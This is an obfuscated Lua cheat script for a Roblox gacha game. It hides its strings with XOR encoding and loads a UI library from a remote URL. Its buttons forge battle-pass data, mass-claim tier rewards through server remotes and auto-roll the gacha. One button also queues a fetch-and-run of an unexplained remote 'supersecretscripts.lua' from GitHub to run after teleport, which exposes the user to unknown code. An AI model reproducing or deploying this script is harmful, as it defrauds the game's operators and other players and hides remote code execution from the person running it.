--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v15,v16) local v17={};for v23=1, #v15 do v6(v17,v0(v4(v1(v2(v15,v23,v23 + 1 )),v1(v2(v16,1 + (v23% #v16) ,1 + (v23% #v16) + 1 )))%256 ));end return v5(v17);end if game.CoreGui:FindFirstChild(v7("\229\203\222\6\238\180\212\27\223\225\218\33","\126\177\163\187\69\134\219\167")) then game.CoreGui.TheChosenBad:Destroy();end local v8=loadstring(game:HttpGet(v7("\43\217\62\213\239\121\130\101\215\253\52\131\45\204\232\43\216\40\208\239\38\223\41\202\242\55\200\36\209\178\32\194\39\138\204\49\194\25\198\238\42\221\62\192\238\114\159\121\138\207\32\223\35\213\232\108\223\47\195\239\108\197\47\196\248\48\130\39\196\245\45\130\1\196\234\44\248\3\235\253\46\200\14\204\239\34\207\38\192\238","\156\67\173\74\165")))();local v9=v8.CreateLib(v7("\4\165\70\14\181\43\71\116\159\92\20\135\7\113\0\147\116","\38\84\215\41\118\220\70"),v7("\127\21\39\19\240","\158\48\118\66\114"));local v10=v9:NewTab(v7("\132\20","\155\203\68\112\86\19\197"));local v11=v10:NewSection(v7("\115\206\51\188\105\108\165\218\67\219\57\238\69\56\213\249\82\222\62\249\68\57","\152\38\189\86\156\32\24\133"));local v12=v9:NewTab(v7("\223\69\162\66\245\67\180","\38\156\55\199"));local v13=v12:NewSection(v7("\133\124\120\45\83\86\227\3\161\88\114\50","\35\200\29\28\72\115\20\154"));local v13=v12:NewSection(v7("\58\173\212\219\132\56\116\45\176\145\247\130\59\39\21\166\145\249\130\62\116\41\173\212\210\132\57\57\89\157\208\203\153\32\49\9\190\194\204","\84\121\223\177\191\237\76"));local v13=v12:NewSection(v7("\139\68\198\184\51\93\49\129\147\67\203\224\9\68\49\213\174\69\137\250\122\126\63\213\251\102\200\180\57\88\53\197","\161\219\54\169\192\90\48\80"));local v14=v9:NewTab(v7("\104\87\20\42","\69\41\34\96"));local v14=v14:NewSection(v7("\136\198\219\6\66\6\185\131\254\12\66\9\169\196\151\57\22\34\176\207\151\40\7\63\189","\75\220\163\183\106\98"));v11:NewButton(v7("\55\180\135\56\218\9\250\170\27\245\66\152\138\57\215\7\168","\185\98\218\235\87"),v7("\234\48\43\166\220\171\197\50\34\244\158\189\194\48\43\166\232\163\216\53\37\234\219\234\255\51\103\223\209\191","\202\171\92\71\134\190"),function() while task.wait() do print(v7("\28\207\32\135\42\202\41\140\105\224\0\164\105\227\45\134\39\196\62","\232\73\161\76"));game.Players.LocalPlayer.PlayerGui.GachaUI.UI.BannerList.Banner2.Visible=true;game.Players.LocalPlayer.PlayerGui.GachaUI.UI.BannerList[v7("\159\203\71\92\19\251\251\67\83\16\190\203","\126\219\185\34\61")].Visible=true;game.Players.LocalPlayer.PlayerGui.GachaUI.UI.BannerList[v7("\46\203\89\123\112\121\250\233\11\142\127\118\104\114\253\243\25\220\91\96\109","\135\108\174\62\18\30\23\147")].Visible=true;game.Players.LocalPlayer.PlayerGui.GachaUI.UI.BannerList.TimeUp.Visible=true;end end);v11:NewButton(v7("\131\231\38\196\27\165\115\229\183\253\62\199\29\190\50\212\165\161\26\217\29\163\58\210\187\160\106\234\22\170\115\234\183\241","\167\214\137\74\171\120\206\83"),v7("\189\213\0\100\184\136\187\176\1\105\205\129\173","\199\235\144\82\61\152"),function() local v18=698 -(208 + 490) ;while true do if (v18==(1 + 0)) then game:GetService(v7("\247\88\113\13\188\12\212","\126\167\52\16\116\217")).LocalPlayer.Data.PassTier.Value=60;for v35=1 + 0 ,60 do local v36=0;local v37;while true do if (v36==0) then v37=836 -(660 + 176) ;while true do if (0==v37) then task.spawn(function() local v47={[1]=v35,[1 + 1 ]=v7("\238\60\37\133","\156\168\78\64\224\212\121")};game:GetService(v7("\53\235\181\194\14\237\164\218\2\234\150\218\8\252\164\201\2","\174\103\142\197")):WaitForChild(v7("\100\45\82\55\49\91","\152\54\72\63\88\69\62")):WaitForChild(v7("\247\200\239\85\217\246\235\75\213\214\234\108\213\215\253","\60\180\164\142")):InvokeServer(unpack(v47));local v48={[1]=v35,[204 -(14 + 188) ]=v7("\104\76\0\36\46\248\31","\114\56\62\101\73\71\141")};game:GetService(v7("\138\236\203\200\177\234\218\208\189\237\232\208\183\251\218\195\189","\164\216\137\187")):WaitForChild(v7("\224\227\60\189\178\251","\107\178\134\81\210\198\158")):WaitForChild(v7("\27\2\131\207\167\10\11\149\199\184\60\62\131\213\185","\202\88\110\226\166")):InvokeServer(unpack(v48));end);task.wait();break;end end break;end end end break;end if (v18==(675 -(534 + 141))) then if queue_on_teleport then queue_on_teleport('loadstring(game:HttpGet("https://raw.githubusercontent.com/buang5516/urban-octo-fishstick/main/supersecretscripts.lua"))()');end game:GetService(v7("\55\26\184\50\2\4\170","\75\103\118\217")).LocalPlayer.Data.hasPass.Value=true;v18=1 + 0 ;end end end);IsRolling=nil;v14:NewButton(v7("\226\26\150\248\138\228\14\129\255\203\131\94\210\239\130\231\29\135\246\199\131\45\131\249\196\198\29\203","\170\163\111\226\151"),v7("\39\21\128\1\14\24\25\81\3\134\13\104\17","\73\113\80\210\88\46\87"),function() print(v7("\179\35\193\30\238\143\43\141\92\169\207","\135\225\76\173\114"));IsRolling=true;while task.wait(0.5 + 0 ) do if (IsRolling==true) then local v30=0;local v31;local v32;local v33;while true do if (v30==(0 + 0)) then v31=21 -11 ;v32=v7("\62\255\189\177\161\253\133\27\227\182\181\190","\199\122\141\216\208\204\221");v30=1 -0 ;end if (v30==(2 -1)) then v33=game:GetService(v7("\159\216\0\252\113\245\172\201\21\244\75\226\162\207\17\247\125","\150\205\189\112\144\24")).Remote.Gacha;v33:InvokeServer(v31,v32);break;end end end end end);v14:NewButton(v7("\4\145\171\67\68\175\16\19\45\133\255\29\84\144\89\50\32\131\184\69\10\129\31\23\101\165\187\90\1\134\5\5\55\129\172\5","\112\69\228\223\44\100\232\113"),v7("\226\58\53\234\246\83\182\148\44\51\230\144\90","\230\180\127\103\179\214\28"),function() local v19=0 + 0 ;local v20;while true do if (v19==(0 + 0)) then v20=396 -(115 + 281) ;while true do if (v20==(2 -1)) then while task.wait(0.5 + 0 ) do if (IsRolling==true) then local v43=10;local v44=v7("\142\172\22\67\191\229\198\162\174\81\101\178\253\202\162\189\4\86\179\248","\175\204\201\113\36\214\139");local v45=game:GetService(v7("\117\201\37\208\13\68\205\33\217\0\116\216\58\206\5\64\201","\100\39\172\85\188")).Remote.Gacha;v45:InvokeServer(v43,v44);end end break;end if (v20==0) then print(v7("\190\10\83\74\237\79\231\204\75\17\8","\128\236\101\63\38\132\33"));IsRolling=true;v20=1;end end break;end end end);v14:NewButton(v7("\140\109\173\143\115\138\121\186\136\50\237\41\233\152\123\143\125\160\143\61\169\56\144\141\50\170\113\183\129\39\164\119\183\201","\83\205\24\217\224"),v7("\208\224\255\4\166\234\253\125\213\241\248\27\192","\93\134\165\173"),function() local v21=0;while true do if (v21==(0 -0)) then local v34=0;while true do if (v34==0) then print(v7("\140\253\205\206\51\192\181\62\240\188\143","\30\222\146\161\162\90\174\210"));IsRolling=true;v34=3 -2 ;end if ((868 -(550 + 317))==v34) then v21=1 -0 ;break;end end end if (v21==(1 -0)) then while task.wait(0.5) do if (IsRolling==true) then local v39=0 -0 ;local v40;local v41;local v42;while true do if (v39==(286 -(134 + 151))) then v42=game:GetService(v7("\106\37\99\240\83\67\89\52\118\248\105\84\87\50\114\251\95","\32\56\64\19\156\58")).Remote.Gacha;v42:InvokeServer(v40,v41);break;end if (v39==(1665 -(970 + 695))) then v40=19 -9 ;v41=v7("\199\75\105\5\235\74\48\35\232\79\119\3\235\79\100\3\234\64","\106\133\46\16");v39=1991 -(582 + 1408) ;end end end end break;end end end);v14:NewButton(v7("\105\220\234\70","\224\58\168\133\54\58\146"),v7("\111\115\121\196\53\169\183\75\106\98\126\219\83","\107\57\54\43\157\21\230\231"),function() local v22=0 -0 ;while true do if (v22==(0 -0)) then print(v7("\232\159\30\229\169\217\203","\175\187\235\113\149\217\188"));IsRolling=false;break;end end end);
